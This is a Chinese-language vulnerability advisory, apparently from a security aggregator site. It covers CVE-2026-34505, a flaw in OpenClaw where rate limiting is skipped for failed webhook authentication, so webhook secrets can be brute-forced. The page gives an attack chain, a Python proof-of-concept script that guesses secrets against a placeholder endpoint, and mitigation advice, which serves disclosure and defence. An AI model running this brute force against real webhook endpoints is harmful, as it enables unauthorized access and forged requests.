CVE-2026-34505 CVSS 6.5 中危

CVE-2026-34505 OpenClaw Webhook认证绕过漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34505

漏洞类型

认证绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.12之前的版本中存在严重的逻辑缺陷。由于系统仅在webhook认证成功后应用速率限制，导致未通过认证的请求不受此限制。攻击者可利用这一漏洞绕过速率限制机制，对webhook密钥进行无限制的暴力破解攻击，从而获取密钥并提交伪造的webhook请求，威胁系统安全。

技术细节

该漏洞的核心在于Webhook认证与速率限制组件之间的逻辑交互错误。正常情况下，速率限制应当应用于所有入站请求以防止滥用。然而，OpenClaw仅在验证密钥有效后才检查或更新速率限制计数器。这意味着，当攻击者发送包含错误密钥的请求时，系统会立即返回认证失败，而不会消耗速率限制配额。攻击者利用这一特性，可以编写脚本自动化地枚举和猜测Webhook密钥，而不会触发IP封禁或延迟响应。一旦成功猜出密钥，攻击者便能伪装成受信任的服务向OpenClaw提交恶意数据，导致数据完整性破坏和潜在的敏感信息泄露。

攻击链分析

STEP 1

侦查阶段

攻击者识别目标系统正在使用OpenClaw，并定位其Webhook接收接口的URL。

STEP 2

漏洞利用

攻击者编写自动化脚本，向Webhook接口发送大量包含不同猜测密钥的POST请求。

STEP 3

绕过防御

由于系统仅对认证成功的请求计数，所有包含错误密钥的请求均不触发速率限制（429错误），攻击者得以持续尝试。

STEP 4

获取权限

当服务器返回HTTP 200状态码时，攻击者确认猜出了正确的Webhook密钥。

STEP 5

完成攻击

攻击者利用获取的有效密钥，构造并提交恶意的Webhook请求数据，执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target OpenClaw webhook endpoint
target_url = "http://target-openclaw-instance.com/api/webhook"

# Common secret candidates for brute force
secrets = ["secret123", "admin_key", "webhook_secret", "password", "api_key_2026"]

headers = {
    "Content-Type": "application/json",
    "User-Agent": "CVE-2026-34505-POC"
}

print("[*] Starting brute force attack on webhook endpoint...")

for secret in secrets:
    # Payload simulating a webhook delivery
    payload = {
        "secret": secret,
        "event": "push",
        "data": "malicious_payload"
    }

    try:
        # Send request
        response = requests.post(target_url, json=payload, headers=headers, timeout=5)

        # Check response
        if response.status_code == 200:
            print(f"[+] SUCCESS! Valid secret found: {secret}")
            print(f"[+] Response: {response.text}")
            break
        elif response.status_code == 401 or response.status_code == 403:
            print(f"[-] Failed: {secret} (Status: {response.status_code})")
            # In this vulnerability, we expect no rate limiting (429) here
        elif response.status_code == 429:
            print("[!] Rate limit detected. Vulnerability might be patched.")
            break
        else:
            print(f"[?] Unexpected status code: {response.status_code}")

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")

影响范围

OpenClaw < 2026.3.12

防御指南

临时缓解措施

如果无法立即升级软件，建议在网络边界（如反向代理Nginx或WAF）上配置针对Webhook端点的严格访问频率控制，确保恶意流量在到达应用层之前被拦截。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表